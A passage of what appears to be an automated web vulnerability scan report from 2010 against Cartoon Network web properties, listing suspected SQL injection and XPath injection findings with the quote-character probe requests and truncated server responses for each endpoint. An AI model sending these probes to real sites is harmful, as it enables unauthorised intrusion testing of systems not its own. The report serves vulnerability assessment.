Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; JSESSIONID=3BF5B03317AA5DBF8F9BDD132799862C

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 02:45:55 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 8547

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /cnvideosvc2/svc/episodeSearch/getEpisodesByCategory?networkName=HOME''&id=multiCat&filterByCollectionId=8a250ab0230ec20c012319d48f9c015b&limit=500&offset=0&r=1269704204105 HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; JSESSIONID=3BF5B03317AA5DBF8F9BDD132799862C

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:45:55 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en-US
Vary: User-Agent,Accept-Encoding
Content-Length: 514

<?xml version="1.0" encoding="UTF-8"?>


       <episodes>
       <recentlyAdded recentlyAddedName="Recently Added" totalItems="0">
       
       </recentlyAdded>
       <episodesBySeasons episodesBySeasonsNam
...[SNIP]...

1.23. http://www.cartoonnetwork.com/cnvideosvc2/svc/episodeSearch/getEpisodesByShow [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cartoonnetwork.com
Path:   /cnvideosvc2/svc/episodeSearch/getEpisodesByShow

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /cnvideosvc2/svc/episodeSearch/getEpisodesByShow?networkName=HOME&id=8a250ab0230ec20c012319d48f9c015b'&limit=500&offset=0&r=1269704204105 HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 02:45:50 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 8547

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /cnvideosvc2/svc/episodeSearch/getEpisodesByShow?networkName=HOME&id=8a250ab0230ec20c012319d48f9c015b''&limit=500&offset=0&r=1269704204105 HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:45:50 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en-US
Vary: User-Agent,Accept-Encoding
Content-Length: 99

<?xml version="1.0" encoding="UTF-8"?>


   <episodes totalItems="0">
   
   </episodes>    
   


1.24. http://www.cartoonnetwork.com/cnvideosvc2/svc/episodeSearch/getEpisodesByShow [networkName parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cartoonnetwork.com
Path:   /cnvideosvc2/svc/episodeSearch/getEpisodesByShow

Issue detail

The networkName parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the networkName parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /cnvideosvc2/svc/episodeSearch/getEpisodesByShow?networkName=HOME'&id=8a250ab0230ec20c012319d48f9c015b&limit=500&offset=0&r=1269704204105 HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 02:45:46 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 8547

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /cnvideosvc2/svc/episodeSearch/getEpisodesByShow?networkName=HOME''&id=8a250ab0230ec20c012319d48f9c015b&limit=500&offset=0&r=1269704204105 HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:45:47 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en-US
Vary: User-Agent,Accept-Encoding
Content-Length: 99

<?xml version="1.0" encoding="UTF-8"?>


   <episodes totalItems="0">
   
   </episodes>    
   


2. XPath injection  previous  next
There are 1872 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.


2.1. http://ben10gamecreator.cartoonnetwork.com/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ben10gamecreator.cartoonnetwork.com
Path:   /index.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /index.html' HTTP/1.1
Host: ben10gamecreator.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:03:18 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 24062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.2. http://www.cartoonnetwork.com/.element/ssi/ads.iframes/eyewonder/interim.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /.element/ssi/ads.iframes/eyewonder/interim.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /.element'/ssi/ads.iframes/eyewonder/interim.html?url=http://cdn.eyewonder.com/100125/765514/1401316/pd_Inc.js?interim=http%3A//www.cartoonnetwork.com/.element/ssi/ads.iframes/eyewonder/interim.html&clickTagFramePrepend=http%3A//ads.cnn.com/event.ng/Type%3Dclick%26FlightID%3D332166%26AdID%3D477790%26TargetID%3D5468%26Segments%3D2743%2C3285%2C4135%2C4677%2C11948%2C24537%2C28173%2C31774%2C33852%2C37272%2C37430%2C40253%2C41858%2C42274%2C42275%2C42673%2C43109%2C43752%2C44046%2C44047%2C44049%2C45046%2C45073%2C45075%26Values%3D47781%26Redirect%3D%5Bewclickthru%5D&iframeURL=http%3A//ads.cartoonnetwork.com/html.ng/site%3Dtoon%26toon_pos%3D728x90_top%26toon_rollup%3Dhomepage%26params.styles%3Dfs%26tile%3D3795625302922%26domId%3D155101&extra=&dom=&stime=1292035285680&cb=1292035285680&guid=ht084A%24WiPTzXsZpPV1vgg HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=728x90_top&toon_rollup=homepage&params.styles=fs&tile=3795625302922&domId=155101
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:46:44 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.3. http://www.cartoonnetwork.com/.element/ssi/ads.iframes/eyewonder/interim.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /.element/ssi/ads.iframes/eyewonder/interim.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /.element/ssi'/ads.iframes/eyewonder/interim.html?url=http://cdn.eyewonder.com/100125/765514/1401316/pd_Inc.js?interim=http%3A//www.cartoonnetwork.com/.element/ssi/ads.iframes/eyewonder/interim.html&clickTagFramePrepend=http%3A//ads.cnn.com/event.ng/Type%3Dclick%26FlightID%3D332166%26AdID%3D477790%26TargetID%3D5468%26Segments%3D2743%2C3285%2C4135%2C4677%2C11948%2C24537%2C28173%2C31774%2C33852%2C37272%2C37430%2C40253%2C41858%2C42274%2C42275%2C42673%2C43109%2C43752%2C44046%2C44047%2C44049%2C45046%2C45073%2C45075%26Values%3D47781%26Redirect%3D%5Bewclickthru%5D&iframeURL=http%3A//ads.cartoonnetwork.com/html.ng/site%3Dtoon%26toon_pos%3D728x90_top%26toon_rollup%3Dhomepage%26params.styles%3Dfs%26tile%3D3795625302922%26domId%3D155101&extra=&dom=&stime=1292035285680&cb=1292035285680&guid=ht084A%24WiPTzXsZpPV1vgg HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=728x90_top&toon_rollup=homepage&params.styles=fs&tile=3795625302922&domId=155101
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:46:45 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.4. http://www.cartoonnetwork.com/.element/ssi/ads.iframes/eyewonder/interim.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /.element/ssi/ads.iframes/eyewonder/interim.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /.element/ssi/ads.iframes'/eyewonder/interim.html?url=http://cdn.eyewonder.com/100125/765514/1401316/pd_Inc.js?interim=http%3A//www.cartoonnetwork.com/.element/ssi/ads.iframes/eyewonder/interim.html&clickTagFramePrepend=http%3A//ads.cnn.com/event.ng/Type%3Dclick%26FlightID%3D332166%26AdID%3D477790%26TargetID%3D5468%26Segments%3D2743%2C3285%2C4135%2C4677%2C11948%2C24537%2C28173%2C31774%2C33852%2C37272%2C37430%2C40253%2C41858%2C42274%2C42275%2C42673%2C43109%2C43752%2C44046%2C44047%2C44049%2C45046%2C45073%2C45075%26Values%3D47781%26Redirect%3D%5Bewclickthru%5D&iframeURL=http%3A//ads.cartoonnetwork.com/html.ng/site%3Dtoon%26toon_pos%3D728x90_top%26toon_rollup%3Dhomepage%26params.styles%3Dfs%26tile%3D3795625302922%26domId%3D155101&extra=&dom=&stime=1292035285680&cb=1292035285680&guid=ht084A%24WiPTzXsZpPV1vgg HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=728x90_top&toon_rollup=homepage&params.styles=fs&tile=3795625302922&domId=155101
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:46:46 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.5. http://www.cartoonnetwork.com/.element/ssi/ads.iframes/eyewonder/interim.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /.element/ssi/ads.iframes/eyewonder/interim.html

Issue detail

The REST URL parameter 4 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 4, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /.element/ssi/ads.iframes/eyewonder'/interim.html?url=http://cdn.eyewonder.com/100125/765514/1401316/pd_Inc.js?interim=http%3A//www.cartoonnetwork.com/.element/ssi/ads.iframes/eyewonder/interim.html&clickTagFramePrepend=http%3A//ads.cnn.com/event.ng/Type%3Dclick%26FlightID%3D332166%26AdID%3D477790%26TargetID%3D5468%26Segments%3D2743%2C3285%2C4135%2C4677%2C11948%2C24537%2C28173%2C31774%2C33852%2C37272%2C37430%2C40253%2C41858%2C42274%2C42275%2C42673%2C43109%2C43752%2C44046%2C44047%2C44049%2C45046%2C45073%2C45075%26Values%3D47781%26Redirect%3D%5Bewclickthru%5D&iframeURL=http%3A//ads.cartoonnetwork.com/html.ng/site%3Dtoon%26toon_pos%3D728x90_top%26toon_rollup%3Dhomepage%26params.styles%3Dfs%26tile%3D3795625302922%26domId%3D155101&extra=&dom=&stime=1292035285680&cb=1292035285680&guid=ht084A%24WiPTzXsZpPV1vgg HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=728x90_top&toon_rollup=homepage&params.styles=fs&tile=3795625302922&domId=155101
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:46:48 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.6. http://www.cartoonnetwork.com/.element/ssi/ads.iframes/eyewonder/interim.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /.element/ssi/ads.iframes/eyewonder/interim.html

Issue detail

The REST URL parameter 5 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 5, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /.element/ssi/ads.iframes/eyewonder/interim.html'?url=http://cdn.eyewonder.com/100125/765514/1401316/pd_Inc.js?interim=http%3A//www.cartoonnetwork.com/.element/ssi/ads.iframes/eyewonder/interim.html&clickTagFramePrepend=http%3A//ads.cnn.com/event.ng/Type%3Dclick%26FlightID%3D332166%26AdID%3D477790%26TargetID%3D5468%26Segments%3D2743%2C3285%2C4135%2C4677%2C11948%2C24537%2C28173%2C31774%2C33852%2C37272%2C37430%2C40253%2C41858%2C42274%2C42275%2C42673%2C43109%2C43752%2C44046%2C44047%2C44049%2C45046%2C45073%2C45075%26Values%3D47781%26Redirect%3D%5Bewclickthru%5D&iframeURL=http%3A//ads.cartoonnetwork.com/html.ng/site%3Dtoon%26toon_pos%3D728x90_top%26toon_rollup%3Dhomepage%26params.styles%3Dfs%26tile%3D3795625302922%26domId%3D155101&extra=&dom=&stime=1292035285680&cb=1292035285680&guid=ht084A%24WiPTzXsZpPV1vgg HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=728x90_top&toon_rollup=homepage&params.styles=fs&tile=3795625302922&domId=155101
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:46:49 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.7. http://www.cartoonnetwork.com/cnschedule/xmlServices/10.EST.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /cnschedule/xmlServices/10.EST.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /cnschedule'/xmlServices/10.EST.xml HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/schedule/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&; adDEon=true; JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:46:46 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.8. http://www.cartoonnetwork.com/cnschedule/xmlServices/ScheduleServices [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /cnschedule/xmlServices/ScheduleServices

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /cnschedule'/xmlServices/ScheduleServices?methodName=getAllShowings&showId=360373&title=Batman&name=Batman&timezone=EST HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/schedule/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&; adDEon=true; JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:47:39 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.9. http://www.cartoonnetwork.com/cnservice/cartoonsvc/content/xml/getContentById.do [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /cnservice/cartoonsvc/content/xml/getContentById.do

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /cnservice'/cartoonsvc/content/xml/getContentById.do?contentId=45027&depth=5&date=http://www.cartoonnetwork.com/ HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/tools/media/home/brandingShell.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:46:12 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.10. http://www.cartoonnetwork.com/cnservice/content/xml/getContentById.do [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /cnservice/content/xml/getContentById.do

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /cnservice'/content/xml/getContentById.do?contentId=48058&depth=4&date=http://www.cartoonnetwork.com/ HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/tools/media/home/brandingShell.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; JSESSIONID=240CE42B6043A2AD9A3BADAFB2EEA696; 1401316autoFreqCap=0

Response

